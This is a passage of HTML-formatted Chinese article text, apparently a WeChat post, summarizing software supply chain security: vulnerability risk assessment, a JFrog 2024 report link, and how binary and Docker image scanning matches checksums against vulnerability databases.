&#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">&#34;企业需综合考虑漏洞、<span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 16px;letter-spacing: 0.578px;text-align: left;text-wrap: wrap;">开发者安全意识不足、</span>license和运维风险，通过平台工具赋能团队。&#34;</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span><span style="font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;font-family: &#34;微软雅黑 Light&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(0, 0, 0);">- 供应链攻击特点：低成本、高收益、影响广泛</span><span style="font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;">    </span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">- 国际安全标准（如SLSA）可能引入国内,用于评估企业软件供应链管理水平</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">- 持续关注并适应日益严格的软件供应链安全要求</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 2;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">漏洞风险评估与管理</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">&#34;74%的docker hub镜像漏洞实际上是不可被利用的漏洞。&#34;</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span><span style="color: rgb(0, 0, 0);font-family: &#34;微软雅黑 Light&#34;;font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;">- 漏洞利用需要特定条件，并非所有漏洞都会被成功攻击</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">- 评估方法：专业工具扫描、分析CVE描述、结合实际使用情况判断</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">- 风险测试手段：组件扫描、软件成分分析、源代码扫描等</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">- 防御策略：</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#FA0000;mso-font-kerning:0.0pt;">了解攻击原理</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">、有选择性地修复漏洞、使用专门工具检查</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 2;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">2024</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">全球软件供应链发展报告</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#0000FF;mso-font-kerning:0.0pt;text-underline:single;text-decoration:underline;"><a href="https://www.jfrogchina.com/software-supply-chain-state-of-union/" target="_blank">https://www.jfrogchina.com/software-supply-chain-state-of-union/</a></span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 1;"><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">2. </span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">软件供应链安全技术创新与应用</span><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#1E4E79;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 2;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#276296;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">技术：二进制和镜像扫描</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">&#34;目前市面上没有一款工具能解决所有问题，</span><span style="font-size: 12pt;font-family: &#34;微软雅黑 Light&#34;;font-variant: normal;text-transform: none;color: rgb(255, 0, 0);">每个工具都有其特定的功能和局限性</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">。&#34;</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#FF0000;mso-font-kerning:0.0pt;">扫描就是撞库</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">！</span><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span>    <o:page></o:page></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">1. 扫描对象：主要针对二进制文件,如Docker镜像等。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">2. 扫描过程:</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>逐层解压镜像文件,生成文件树结构</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>识别特定文件类型(如.jar、.war、.tar包等)</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>对识别的文件进行扫描</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">3. 扫描原理:</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>使用&#34;撞库&#34;方法,将文件的校验和(checksum)与已知漏洞库进行匹配</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>如果匹配成功,则标记存在相应漏洞</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">4. 性能特点:</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>扫描速度快,主要消耗CPU资源</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>相比源码扫描,二进制扫描更快</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">5. 上下文分析:</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>在单独的容器中进行</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>包括反编译、分析类路径等步骤</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;"><span style="mso-spacerun:yes;">   </span>-<span style="mso-spacerun:yes;"> </span>耗时相对较长</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">6. 效率:对于100MB左右的Docker镜像,可在1分钟内完成扫描</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#000000;mso-font-kerning:0.0pt;">总的来说,这项技术通过快速的二进制扫描和匹配来检测软件中的已知漏洞,同时结合上下文分析提供更</span><span style="font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;font-family: &#34;微软雅黑 Light&#34;;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;color: rgb(0, 0, 0);">深入的安全评估。虽然不能解决所有问题,但在软件安全检测方面提供了高效的解决方案</span><span style="font-size: 12pt;text-indent: 0pt;letter-spacing: 0.034em;">    </span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 2;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">技术：</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;">隔离仓库管理第三方依赖</span><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#2E75B5;mso-font-kerning:0.0pt;font-weight:bold;mso-bidi-font-weight:bold;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-family:等线;mso-ascii-font-family:等线;mso-fareast-font-family:等线;font-variant:normal;text-transform:none;"><img class="rich_pages wxw-img" data-imgfileid="100000411" data-ratio="0.5734265734265734" width="476.27001953125" data-type="png" data-w="715" height="273.1400146484375" src="https://wechat2rss.xlab.app/img-proxy/?k=9cba810d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINytGR2wdgOdIHAj7kJeyAS3w2WAFFxFJtau6bnBuazSHdyLJiaYKibBUQZl2gkPzmY9AxdwDVib6LAzw%2F640%3Fwx_fmt%3Dpng"/></span><span style="font-size:11.0pt;font-family:Calibri;mso-ascii-font-family:Calibri;mso-fareast-font-family:宋体;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:12.0pt;mso-bidi-font-size:12.0pt;font-family:微软雅黑 Light;mso-ascii-font-family:微软雅黑 Light;mso-fareast-font-family:微软雅黑 